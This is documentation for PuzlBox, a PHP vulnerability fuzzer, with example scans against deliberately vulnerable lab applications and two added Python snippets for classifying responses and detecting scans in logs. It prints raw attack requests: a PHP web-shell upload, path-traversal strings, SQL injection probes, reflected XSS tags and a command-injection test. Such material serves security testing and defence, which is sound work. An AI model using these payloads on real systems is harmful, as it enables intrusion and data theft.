Puzlbox
Description
PuzlBox is a PHP fuzzing tool written by John Leitch. It scans for several different vulnerabilities by performing dynamic program analysis. The following tests are currently performed:
- Arbitrary Command Execution
- Arbitrary File Read/Write/Change/Rename/Delete
- Local File Inclusion (LFI)
- Arbitrary PHP Execution
- SQL Injection
- Reflected Cross-site Scripting (XSS)
For each test, specific payloads (forged requests) are sent to the web application and the responses from the server are analyzed. Depending on the results (HTTP response code, errors, ...), the test is interpreted as positive (discovery of a potential vulnerability) or negative. All positive tests appear in the generated reports together with the payloads that were sent.
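As an added illustration (not PuzlBox's own code), the response-side decision can be reduced to a few markers taken from the alerts reproduced later on this page: a MySQL syntax error for SQL injection, the unencoded <script>alert(0)</script> payload for reflected XSS, the echoed "testatestb" for PHP execution and the planted LFI_Test123 string for file inclusion. The sample bodies below are constructed; modes C and F are left out because the page does not describe how their results are checked.

```python
import re

# Markers taken from the alerts shown on this page; the decision logic
# itself is an illustration written for this document, not PuzlBox's code.
SQL_ERROR   = re.compile(r"You have an error in your SQL syntax", re.I)
XSS_PAYLOAD = "<script>alert(0)</script>"   # must come back unencoded
PHP_MARKER  = "testatestb"                  # output of <?php echo 'testa'.'testb'; ?>
LFI_MARKER  = "LFI_Test123"                 # content of the planted lfi_test.txt


def classify(mode, status, body):
    """Map one scan mode's HTTP response to an alert name, or None if negative."""
    # A database error is telling regardless of the status code.
    if mode == "S" and SQL_ERROR.search(body):
        return "Potential SQL Injection"
    if status != 200:
        return None
    if mode == "X" and XSS_PAYLOAD in body:      # payload reflected verbatim
        return "Reflected XSS"
    if mode == "P" and PHP_MARKER in body:       # payload was executed, not echoed
        return "Arbitrary PHP Execution"
    if mode == "L" and LFI_MARKER in body:       # planted file was included
        return "Local File Inclusion"
    return None


# Constructed response bodies modelled on the evidence sections of this page.
SQLI_BODY = ("select id, username, password from user where id=';--\";--</div>"
             "SQL ERROR: You have an error in your SQL syntax; check the manual")
XSS_BODY  = "where id=1<script>alert(0)</script></div>SQL ERROR: ..."
SAFE_BODY = "where id=1&lt;script&gt;alert(0)&lt;/script&gt;"   # encoded: negative
LFI_BODY  = '<select name="page">...</select></form> LFI_Test123 </body>'
PHP_BODY  = "<div>Welcome testatestb</div>"
ECHO_BODY = "<div>Welcome <?php echo 'testa'.'testb'; ?></div>"  # echoed, not run
```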
Installation
- Puzlbox is available here:
http://downloads.sourceforge.net/project/puzlbox1/puzlbox1022.zip
- Download, and unzip in C:\puzlbox\
Usage
Syntax
puzlbox [-s Server (default localhost)] [-m Scan Modes (default CFLPSX)] [Absolute Web Root] [-n No Unhook] [Application Paths (comma delimited)]
Modes
The following modes are currently available:
- C - Arbitrary Command Execution
- F - Arbitrary File Read/Write/Change/Rename/Delete
- L - Local File Inclusion
- P - Arbitrary PHP Execution
- S - SQL Injection
- X - Reflected Cross-site Scripting
Refer to the examples section for details.
Running puzlbox
For PuzlBox to successfully run the following conditions must be met:
- PuzlBox must be run as administrator!
- The targeted web application must not be accessed while PuzlBox is running!
- Only one instance of PuzlBox per web root folder can be running at any time!
Reports
Two types of reports are generated:
- Scan Overview Report: All concerned fields with their payloads are reported here. You will find which fields are potentially vulnerable to each attack.
- Vulnerability Report: If a vulnerability is confirmed, the complete payload together with the response is reported here.
Examples
Environment
Full tests have been performed against various specific PHP applications to confirm all vulnerabilities. Environments include:
- Damn Vulnerable Web Application (DVWA): http://downloads.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
- PoC to test SQL injections and Reflected Cross-site Scripting (XSS): http://dl.dropbox.com/u/10761700/poc-sql-injection.rar
- PoC to test Code Injection: http://dl.dropbox.com/u/10761700/poc-command-injection.rar
- PoC to test Local File Inclusion (LFI): http://dl.dropbox.com/u/10761700/poc-local-file-inclusion.rar
Arbitrary Command Injection
The -m C parameter tests the application for arbitrary command injection. It sends the string "C:\WINDOWS\system32\calc.exe" to form fields. Here are the logs of a puzlbox run against a vulnerable application.
C:\puzlbox> puzlbox.exe -m C c:\web command-injection
produces:
----------------------------------------------------------------
Command Execution Scan
----------------------------------------------------------------
/command-injection/index.php
  $_GET
    cmd = C:\WINDOWS\system32\calc.exe
/command-injection/index.php
  $_GET
    cmd = C:\WINDOWS\system32\calc.exe
And here is the alert confirming the vulnerability:
Alert Name: Command Execution
POST /command-injection/index.php?cmd=C%3a%5cWINDOWS%5csystem32%5ccalc.exe HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Arbitrary File Read/Write/Change/Rename/Delete
The -m F parameter tests the web application for arbitrary file operations (read, write, change, rename, delete).
C:\puzlbox> puzlbox.exe -m F c:\web dvwa
Produces the following results (extract):
----------------------------------------------------------------
Aribtray File Read/Write/Change/Rename/Delete Scan
----------------------------------------------------------------
/dvwa/about.php
/dvwa/ids_log.php
/dvwa/index.php
/dvwa/instructions.php
/dvwa/login.php
  $_POST
    Login = shell.php
    username = shell.php
    password = shell.php
/dvwa/logout.php
/dvwa/phpinfo.php
/dvwa/security.php
/dvwa/setup.php
  $_POST
    create_db = shell.php
/dvwa/vulnerabilities/view_help.php
[...TRUNCATED...]
A vulnerability has nonetheless been confirmed:
Alert Name: Arbitrary File Upload
POST /dvwa/vulnerabilities/upload/source/low.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 262
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="Upload"

shell.php
------x
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--

HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 07:52:33 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 526
Content-Type: text/html

<br />
<b>Warning</b>: move_uploaded_file(DVWA_WEB_PAGE_TO_ROOThackable/uploads/shell.php) [<a href='function.move-uploaded-file'>function.move-uploaded-file</a>]: failed to open stream: No such file or directory in <b>C:\web\fern.php</b> on line <b>10</b><br />
<br />
<b>Warning</b>: move_uploaded_file() [<a href='function.move-uploaded-file'>function.move-uploaded-file</a>]: Unable to move 'C:\xampp\tmp\php473.tmp' to 'DVWA_WEB_PAGE_TO_ROOThackable/uploads/shell.php' in <b>C:\web\fern.php</b> on line <b>10</b><br />
----------------------------------------------------------------
Local File Inclusion
The -m L parameter tests the application for Local File Inclusion (LFI). The following command has been run against a vulnerable application.
puzlbox.exe -m L c:\web local-file-inclusion
Produces the following results (extract):
----------------------------------------------------------------
Local File Inclusion Scan
----------------------------------------------------------------
/local-file-inclusion/index.php
  $_GET
    page = ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt
/local-file-inclusion/index.php
  $_GET
    page = ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Flfi_test.txt
/local-file-inclusion/index.php
  $_GET
    page = ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt%00
Here is the evidence of the vulnerability:
Alert Name: Local File Inclusion
POST /local-file-inclusion/index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 14:33:28 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 393
Content-Type: text/html

<html>
<head>
<title>Local File Inclusion</title>
</head>
<body>
<form name="form1" method="get" action="index.php">
Select a page to load:
<select name="page" onchange="document.form1.submit();">
<option value="page1.txt">page 1</option>
<option value="page2.txt">page 2</option>
<option value="page3.txt">page 3</option>
</select>
</form>
LFI_Test123
</body>
</html>
----------------------------------------------------------------
Arbitrary PHP Execution
The -m P parameter tests the application for arbitrary PHP execution. It sends the following content to form fields, with and without the PHP tags: <?php echo 'testa'.'testb'; ?>
puzlbox.exe -m P c:\web dvwa
Produces the following results (extract):
----------------------------------------------------------------
Arbitrary PHP Execution Scan
----------------------------------------------------------------
/dvwa/about.php
/dvwa/ids_log.php
/dvwa/index.php
/dvwa/instructions.php
/dvwa/login.php
  $_POST
    Login = <?php echo 'testa'.'testb'; ?>
    username = <?php echo 'testa'.'testb'; ?>
    password = <?php echo 'testa'.'testb'; ?>
/dvwa/logout.php
/dvwa/phpinfo.php
/dvwa/security.php
/dvwa/setup.php
  $_POST
    create_db = <?php echo 'testa'.'testb'; ?>
/dvwa/vulnerabilities/view_help.php
[...TRUNCATED...]
SQL Injection
The -m S parameter tests the application for SQL injection. Tests have been run against a vulnerable index.php page that queries a user table.
puzlbox.exe -m S c:\web sqlinj
Produces the following results (extract):
----------------------------------------------------------------
SQL Injection Scan
----------------------------------------------------------------
/sqlinj/index.php
  $_POST
    username = ';--";--
    password = ';--";--
/sqlinj/index.php
  $_POST
    username = \';--\";--
    password = \';--\";--
    id = \';--\";--
/sqlinj/index.php
  $_POST
    username = \\';--\\";--
    password = \\';--\\";--
[...TRUNCATED...]
Vulnerabilities have been confirmed:
Alert Name: Potential SQL Injection
POST /sqlinj/index.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 147
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="username"

';--";--
------x
Content-Disposition: form-data; name="id"

';--";--
------x--

HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 08:39:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 1589
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>
<div style="float:left">
<fieldset>
<legend>Select from ID</legend>
<form method="POST" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
</div>
<div style="float:left">
<fieldset>
<legend>Create user</legend>
<form method="POST" action="index.php">
<div>USERNAME: <input type="text" name="username" /></div>
<div>PASSWORD: <input type="text" name="password" /></div>
<div><input type="submit" value="Go" /></div>
</form>
</fieldset>
</div>
<div style="clear:both"></div>
<hr />
<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=';--";--</div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ;--";--' at line 1
----------------------------------------------------------------
Alert Name: Potential SQL Injection
POST /sqlinj/index.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 217
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="username"

';--";--
------x
Content-Disposition: form-data; name="password"

';--";--
------x
Content-Disposition: form-data; name="id"

';--";--
------x--

HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 08:39:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 1468
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>
<div style="float:left">
<fieldset>
<legend>Select from ID</legend>
<form method="POST" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
</div>
<div style="float:left">
<fieldset>
<legend>Create user</legend>
<form method="POST" action="index.php">
<div>USERNAME: <input type="text" name="username" /></div>
<div>PASSWORD: <input type="text" name="password" /></div>
<div><input type="submit" value="Go" /></div>
</form>
</fieldset>
</div>
<div style="clear:both"></div>
<hr />
SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';--";--',;--";--')' at line 1
----------------------------------------------------------------
[...TRUNCATED...]
Reflected Cross-site Scripting
The -m X parameter tests the application for Reflected Cross-site Scripting (XSS). The following has been run against a vulnerable application (the same one used for SQL injection).
C:\puzlbox> puzlbox.exe -m X c:\web sql-injection
Produces the following results:
----------------------------------------------------------------
Reflected Cross-site Scripting Scan
----------------------------------------------------------------
/sql-injection/index.php
  $_GET
    id = 2<script>alert(0)</script>
/sql-injection/upload/cmd.php
  $_GET
    cmd = 7<script>alert(0)</script>
/sql-injection/index.php
  $_GET
    id = 5 <script>alert(0)</script>
/sql-injection/upload/cmd.php
  $_GET
    cmd = 9 <script>alert(0)</script>
And here is the evidence of the vulnerability (extract):
Alert Name: Reflected XSS
GET /sql-injection/index.php?id=1%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 04:52:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 568
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>
<fieldset>
<legend>Select from ID</legend>
<form method="GET" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
<hr />
<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=1<script>alert(0)</script></div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>' at line 1
----------------------------------------------------------------
Alert Name: Reflected XSS
GET /sql-injection/index.php?id=2%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 04:52:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 568
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>
<fieldset>
<legend>Select from ID</legend>
<form method="GET" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
<hr />
<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=2<script>alert(0)</script></div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>' at line 1
----------------------------------------------------------------
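The scanner's GET requests shown in these examples also leave a recognisable trace in the web server's access log. As an added example (not part of PuzlBox or this document), the script below parses constructed Apache combined-format lines modelled on the requests above and flags the URL-decoded parameter values that match the traversal, script-tag and Windows-path patterns; the log lines, client address and rule thresholds are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed combined-format lines modelled on the requests this page shows
# PuzlBox sending (sample data for this example, not real server logs).
SAMPLE_LOG = """\
127.0.0.1 - - [03/Jan/2011:07:52:33 +0000] "POST /command-injection/index.php?cmd=C%3a%5cWINDOWS%5csystem32%5ccalc.exe HTTP/1.1" 200 0 "-" "x"
127.0.0.1 - - [03/Jan/2011:14:33:28 +0000] "POST /local-file-inclusion/index.php?page=..%2f..%2f..%2f..%2flfi_test.txt HTTP/1.1" 200 393 "-" "x"
127.0.0.1 - - [04/Jan/2011:04:52:09 +0000] "GET /sql-injection/index.php?id=1%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1" 200 568 "-" "x"
127.0.0.1 - - [04/Jan/2011:05:00:00 +0000] "GET /local-file-inclusion/index.php?page=page1.txt HTTP/1.1" 200 393 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Each rule is applied to the URL-decoded value of every query parameter.
# Note: multipart POST bodies (the SQL injection and upload payloads shown
# on this page) never reach the access log, so they cannot be caught here.
RULES = [
    ("path traversal",   lambda v: v.count("../") >= 3 or "\x00" in v),
    ("script injection", lambda v: re.search(r"<script\b", v, re.I) is not None),
    ("windows path",     lambda v: re.match(r"^[a-z]:\\", v, re.I) is not None),
]


def scan_log(text):
    """Return (client, path, parameter, rule) tuples for suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        client, _ts, _method, target, _status, _agent = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so encoded traversal (%2f) is seen as "../"
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            for rule, test in RULES:
                if test(value):
                    hits.append((client, parts.path, name, rule))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```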